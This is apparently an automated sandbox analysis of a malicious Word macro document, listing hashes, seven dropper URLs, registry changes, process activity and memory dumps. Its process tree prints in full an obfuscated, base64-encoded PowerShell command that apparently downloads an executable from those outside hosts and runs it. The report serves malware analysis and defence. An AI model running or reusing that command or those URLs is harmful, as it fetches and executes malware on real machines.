30a43e3c1b38fe5a37ce0fcdcaee4cef05b4d6682e668d782131c7c54de0e292

Analysis

max time kernel
121s
max time network
126s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
08/09/2024, 03:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d37abef20b2749210d8aad65f0bc09e3_JaffaCakes118.doc
Size

227KB
MD5

d37abef20b2749210d8aad65f0bc09e3
SHA1

7279d14b6a86a129bf433f2bcae642819e8afedf
SHA256

30a43e3c1b38fe5a37ce0fcdcaee4cef05b4d6682e668d782131c7c54de0e292
SHA512

0b08b0afd963c4c3265c6c91211741a0ec760f9c7aef6c29d3e887b76035410b6e625e0459811d982155d753c2d89c6eb14cd8f96cf9d086c6f0e68106b39fe7
SSDEEP

3072:PYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////s:R0uXnWFchmmcI/o1/uEP9cPwc2

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://miradoors.md/backup/hFiCHxXv/

exe.dropper

http://kuntur.tur.ar/wp-admin/OBoiKylqUuhlh/

exe.dropper

https://mhsr.ch/wp-admin/qHvi9amkg5llk43185606/

exe.dropper

http://miradoors.ro/cgi-bin/vhUgA4mu6tg1x461/

exe.dropper

http://nikniek.nl/cgi-bin/A74t5p0sobrc273635587/

exe.dropper

http://qualityhairbundles.com/of/FIKQDxATiQHEd/

exe.dropper

http://karaz.atwebpages.com/admin/2a4j1aqkks855324/

Signatures

Blocklisted process makes network request 7 IoCs

flow	pid	Process
5	2624	powersheLL.exe
6	2624	powersheLL.exe
7	2624	powersheLL.exe
9	2624	powersheLL.exe
12	2624	powersheLL.exe
14	2624	powersheLL.exe
16	2624	powersheLL.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D600999B-1CAA-404E-867B-9ABF6393537D}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D600999B-1CAA-404E-867B-9ABF6393537D}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{D600999B-1CAA-404E-867B-9ABF6393537D}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D600999B-1CAA-404E-867B-9ABF6393537D}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{D600999B-1CAA-404E-867B-9ABF6393537D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{D600999B-1CAA-404E-867B-9ABF6393537D}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2260	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2624	powersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2624	powersheLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2260	WINWORD.EXE
2260	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2260 wrote to memory of 2628	2260	WINWORD.EXE	35
PID 2260 wrote to memory of 2628	2260	WINWORD.EXE	35
PID 2260 wrote to memory of 2628	2260	WINWORD.EXE	35
PID 2260 wrote to memory of 2628	2260	WINWORD.EXE	35

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d37abef20b2749210d8aad65f0bc09e3_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2260
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2628

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABYAGIAcwBjAGMAMQAwAD0AKAAoACcAWQA0ACcAKwAnAHUAZgAnACkAKwAoACcAcAAnACsAJwB4AGYAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AHQAZQBNAFAAXABXAE8AcgBkAFwAMgAwADEAOQBcACAALQBpAHQAZQBtAHQAeQBwAGUAIABkAGkAUgBFAGMAVABvAHIAeQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBgAEUAYwBVAFIAaQB0AFkAUABSAG8AdABvAGAAQwBgAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAsACcAKQArACgAJwAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxACcAKwAnADEAJwApACsAKAAnACwAJwArACcAIAB0AGwAJwApACsAJwBzACcAKQA7ACQARQByAGkAcAB0AG8AaAAgAD0AIAAoACgAJwBHAGwAJwArACcAawAnACsAJwB0ADAANwBjACcAKQArACcAOQAnACkAOwAkAFkAYwBpAHUAegBkADMAPQAoACgAJwBHADQAYwAnACsAJwBxACcAKQArACcAZwAnACsAJwBuADMAJwApADsAJABNAHUAbwBiAGwANgB5AD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwBQACcAKwAoACcAdgAnACsAJwBEAHcAJwApACsAKAAnAG8AcgAnACsAJwBkACcAKQArACgAJwBQAHYAJwArACcARAAyACcAKwAnADAAMQA5AFAAdgAnACsAJwBEACcAKQApAC0AUgBFAHAAbABBAEMARQAoACcAUAAnACsAJwB2AEQAJwApACwAWwBjAEgAYQByAF0AOQAyACkAKwAkAEUAcgBpAHAAdABvAGgAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFcAZABzAGwAcwB1AHQAPQAoACgAJwBOACcAKwAnAGcAaQAnACkAKwAoACcAZAAnACsAJwB6AHkAJwApACsAJwBhACcAKQA7ACQAUQByADIAMwBjAG4AOAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgB3AEUAYgBjAEwAaQBlAE4AVAA7ACQAVQBtADkAaQAxADQAZAA9ACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAvACcAKQArACgAJwAvAG0AJwArACcAaQByAGEAZAAnACsAJwBvAG8AJwApACsAJwByACcAKwAoACcAcwAuACcAKwAnAG0AJwApACsAKAAnAGQALwAnACsAJwBiACcAKQArACcAYQBjACcAKwAnAGsAdQAnACsAJwBwAC8AJwArACcAaABGACcAKwAoACcAaQBDAEgAJwArACcAeABYAHYAJwArACcALwAqAGgAdAAnACkAKwAnAHQAcAAnACsAKAAnADoALwAvAGsAdQBuACcAKwAnAHQAdQByACcAKQArACgAJwAuAHQAJwArACcAdQByACcAKQArACgAJwAuAGEAJwArACcAcgAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AJwArACgAJwBhACcAKwAnAGQAbQBpACcAKQArACcAbgAvACcAKwAnAE8AJwArACcAQgBvACcAKwAoACcAaQBLAHkAJwArACcAbABxACcAKQArACgAJwBVAHUAJwArACcAaABsAGgALwAnACsAJwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcABzACcAKwAnADoALwAvAG0AaAAnACkAKwAoACcAcwAnACsAJwByAC4AJwApACsAJwBjAGgAJwArACgAJwAvAHcAcAAnACsAJwAtACcAKQArACcAYQAnACsAJwBkAG0AJwArACcAaQBuACcAKwAoACcALwBxAEgAdgAnACsAJwBpADkAYQBtACcAKwAnAGsAJwApACsAKAAnAGcANQBsACcAKwAnAGwAawA0ACcAKQArACgAJwAzADEAJwArACcAOAA1ADYAMAAnACkAKwAnADYAJwArACgAJwAvACcAKwAnACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAJwArACcAOgAvACcAKQArACgAJwAvAG0AJwArACcAaQByACcAKQArACgAJwBhACcAKwAnAGQAbwBvAHIAcwAuACcAKQArACgAJwByAG8ALwBjAGcAJwArACcAaQAtACcAKQArACcAYgAnACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHYAJwApACsAKAAnAGgAVQAnACsAJwBnAEEANAAnACkAKwAoACcAbQB1ADYAJwArACcAdAAnACkAKwAnAGcAMQAnACsAJwB4ACcAKwAoACcANAAnACsAJwA2ADEALwAqAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJwAvAG4AJwApACsAJwBpACcAKwAoACcAawBuACcAKwAnAGkAJwApACsAKAAnAGUAawAuAG4AJwArACcAbAAnACkAKwAoACcALwBjACcAKwAnAGcAaQAtACcAKQArACcAYgAnACsAKAAnAGkAJwArACcAbgAvAEEANwAnACkAKwAoACcANAB0ADUAJwArACcAcAAnACkAKwAnADAAJwArACcAcwBvACcAKwAoACcAYgByACcAKwAnAGMAMgAnACkAKwAoACcANwAzADYAJwArACcAMwA1ACcAKQArACgAJwA1ACcAKwAnADgANwAvACcAKQArACgAJwAqAGgAJwArACcAdAB0AHAAJwApACsAJwA6ACcAKwAoACcALwAnACsAJwAvAHEAdQAnACkAKwAoACcAYQAnACsAJwBsAGkAJwApACsAKAAnAHQAJwArACcAeQBoACcAKQArACgAJwBhAGkAcgBiACcAKwAnAHUAJwApACsAJwBuACcAKwAnAGQAJwArACgAJwBsAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AJwArACcAbQAvAG8AZgAvACcAKwAnAEYAJwArACcASQAnACsAJwBLAFEARAB4AEEAJwApACsAJwBUACcAKwAnAGkAUQAnACsAJwBIAEUAJwArACcAZAAnACsAJwAvACoAJwArACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQArACcAOgAnACsAJwAvACcAKwAoACcALwBrACcAKwAnAGEAcgAnACkAKwAoACcAYQB6ACcAKwAnAC4AYQAnACkAKwAnAHQAdwAnACsAKAAnAGUAJwArACcAYgAnACsAJwBwAGEAZwAnACsAJwBlAHMALgBjAG8AbQAvACcAKQArACgAJwBhACcAKwAnAGQAbQAnACkAKwAnAGkAbgAnACsAKAAnAC8AMgAnACsAJwBhADQAagAnACkAKwAoACcAMQBhAHEAJwArACcAawBrAHMAJwArACcAOAA1ACcAKQArACgAJwA1ADMAMgAnACsAJwA0ACcAKQArACcALwAnACkALgAiAHMAcABMAGAASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATwBvAGUAeAAyADAAagA9ACgAJwBVACcAKwAoACcAMgBnADUAYwAnACsAJwBqACcAKQArACcAYwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABFAHcANwB6AGUAOQBpACAAaQBuACAAJABVAG0AOQBpADEANABkACkAewB0AHIAeQB7ACQAUQByADIAMwBjAG4AOAAuACIARABvAFcATgBMAE8AYABBAGQAYABGAGkAYABsAEUAIgAoACQARQB3ADcAegBlADkAaQAsACAAJABNAHUAbwBiAGwANgB5ACkAOwAkAE8AMABkADMAdQB4AGcAPQAoACgAJwBOADgAYgBzADcAJwArACcAegAnACkAKwAnADEAJwApADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAE0AdQBvAGIAbAA2AHkAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAzADEAOQA3ADYAKQAgAHsALgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUALQBJAHQAZQBtACcAKQAoACQATQB1AG8AYgBsADYAeQApADsAJABDADcAMwBpAGUANgA4AD0AKAAoACcAVQAnACsAJwB0ADMAbwAxAGoAJwApACsAJwBqACcAKQA7AGIAcgBlAGEAawA7ACQARwB1ADIAdQBqAHEAOQA9ACgAJwBUAGUAJwArACcANQA5ACcAKwAoACcAMwAnACsAJwA1AGQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AYgBfAG8AawAyAHAAPQAoACgAJwBFADkAJwArACcAMgBkAG8AJwApACsAJwBfADUAJwApAA==
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
2eadfa5fb1ecd2f7e66bdf65fd2060d6

SHA1
7cf656338e36271501374145d78b7bd411888097

SHA256
9e2e14bff9ba0365d42c7747363632d6623b54dc0ced5aad3b3e015931d703f9

SHA512
ab27eb94b94fae7a4f23eb0958be7c1a0a50807617f2ce0287c416935b2867646e4616dd04f7e211c43eafb29b5ffc9da78c59ee7892e297a17a976c290c0608

Download Submit
memory/2260-25-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-15-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-5-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-6-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-10-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-11-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-9-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-8-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-7-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-12-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-19-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-20-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-21-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-18-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-17-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-16-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-0-0x000000002FF31000-0x000000002FF32000-memory.dmp

Filesize
4KB

Download
memory/2260-14-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-2-0x0000000070CFD000-0x0000000070D08000-memory.dmp

Filesize
44KB

Download
memory/2260-13-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-28-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-31-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-29-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-30-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-27-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-26-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-24-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-23-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-22-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-64-0x0000000070CFD000-0x0000000070D08000-memory.dmp

Filesize
44KB

Download
memory/2260-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2260-43-0x0000000070CFD000-0x0000000070D08000-memory.dmp

Filesize
44KB

Download
memory/2260-44-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-45-0x0000000005B90000-0x0000000005C90000-memory.dmp

Filesize
1024KB

Download
memory/2260-46-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-47-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/2260-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2624-38-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2624-37-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download